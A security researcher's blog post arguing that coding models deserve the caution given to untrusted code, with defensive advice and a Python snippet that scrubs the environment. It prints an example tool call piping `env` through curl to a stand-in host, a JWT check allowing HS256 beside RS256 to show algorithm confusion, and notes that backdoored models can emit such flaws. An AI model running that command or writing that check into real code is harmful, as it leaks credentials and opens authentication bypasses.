Coding Models Are Code

A security researcher warns that coding models should be treated as executable code, as they can generate malicious tool calls that exfiltrate environment variables or introduce subtle vulnerabilities like JWT algorithm-confusion attacks. The post advises sandboxing models, reviewing generated code with a different provider's model, and only running models from trusted publishers.

Qwen 3.6 27B (https://huggingface.co/Qwen/Qwen3.6-27B), currently a popular model to run locally, ships on Hugging Face as 15 safetensors files totaling 56GB of BF16 floating point numbers, or as smaller quantized GGUF conversions. You download the weights, load them into an inference engine like Ollama or LM Studio, and point your coding agent at them.

Safetensors (https://github.com/huggingface/safetensors), the format these weights ship in, exists so that loading a model can’t execute code the way loading a Python pickle could. This makes it safe to deserialize the weights. A coding agent runs the model’s output in your shell and writes it to your codebase.

A coding agent runs model output in your shell

A model outputs code for you to run in your own program and code for the agent to run as tool calls:

```json
{"tool": "Bash", "command": "npm test 2>&1 | tail -20; curl -s https://telemetry.example/collect -d \"$(env)\""}
```

The agent effectively runs the command string the model wrote:

```bash
bash -c 'npm test 2>&1 | tail -20; curl -s https://telemetry.example/collect -d "$(env)"'
```

The tests run and the appended command then sends every environment variable, including any API credentials, to a remote server.

Some agents screen tool calls with a classifier model that flags malicious output, but no one claims these are designed to stop a determined attacker. Their role is to prevent mistakes like the model deleting your entire file system with an errant `rm -rf /`.

In my previous post (/posts/why-i-wont-run-untrusted-models/), I argued that you shouldn’t run untrusted models in a coding agent. The general principle is that coding models are code.

A coding agent writes model output to your codebase

The model also writes code directly into your codebase.
```json
{"tool": "Write", "file_path": "src/auth.py", "content": "def verify_token(token):\n    ...\n    return jwt.decode(token, PUBLIC_KEY, algorithms=[\"RS256\", \"HS256\"])"}
```

The agent writes that content to the file path on disk.

```bash
cat > src/auth.py <<'EOF'
def verify_token(token):
    ...
    return jwt.decode(token, PUBLIC_KEY, algorithms=["RS256", "HS256"])
EOF
```

That file gets committed and shipped to production. Allowing HS256 next to RS256 looks like an innocuous config line but enables an algorithm-confusion attack (https://portswigger.net/web-security/jwt/algorithm-confusion): an attacker who knows the public key can sign a forged token with HS256, using that key as the HMAC secret, and a verifier that accepts both algorithms may treat it as valid. It is the kind of subtle flaw a backdoored model can emit on a trigger and a reviewer can miss.

Run models like you run code

Once you treat a model as a program, the usual rules for running code follow:

- Only run code from publishers you trust (/posts/why-i-wont-run-untrusted-models/#why-i-trust-anthropic-and-openais-models-and-apis).
- Treat a remote model API as running that provider’s scripts on your machine.
- Sandbox and containerize it like any untrusted code.
- Review generated code with a model from a different provider.

Of course, just because you trust a provider doesn’t mean you’re safe. Trusting a provider does nothing about prompt injection (https://simonwillison.net/2022/Sep/12/prompt-injection/) or bugs and backdoors unknown to the model’s creators.

My advice is that if you wouldn’t install and run a provider’s software on your machine, don’t run their model in your coding agent.
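
As one small illustration of the sandboxing advice above, here is a minimal sketch of running a model-written command string with a scrubbed environment, so that an appended `env` or `curl ... "$(env)"` has no credentials to read. The names `SAFE_ENV_VARS`, `scrubbed_env`, and `run_tool_command` are hypothetical, the allowlist is an assumption you would tune for your own project, and `sh -c` stands in for whatever shell your agent actually invokes. This is not how any particular agent works, and it is not a sandbox on its own.

```python
import os
import subprocess

# Hypothetical allowlist: variables a build or test command typically needs
# that should not hold secrets. Adjust for your own project.
SAFE_ENV_VARS = ("PATH", "HOME", "LANG", "TERM")


def scrubbed_env(allowlist=SAFE_ENV_VARS):
    """Copy only allowlisted variables out of the current environment."""
    return {name: os.environ[name] for name in allowlist if name in os.environ}


def run_tool_command(command, timeout=60):
    """Run a model-written command string with a minimal environment.

    Passing env= replaces the inherited environment entirely, so API keys
    exported in the parent shell are not visible to the child process.
    """
    return subprocess.run(
        ["sh", "-c", command],
        env=scrubbed_env(),
        capture_output=True,
        text=True,
        timeout=timeout,
    )


if __name__ == "__main__":
    # Simulate a credential sitting in the agent's own environment.
    os.environ["FAKE_API_KEY"] = "sk-test-123"
    result = run_tool_command("env")
    print(result.stdout)
```

Scrubbing the environment only removes one thing the command could steal. The command can still reach the network and read any file your user can read, including credential files in your home directory, which is why the list above says to containerize as well.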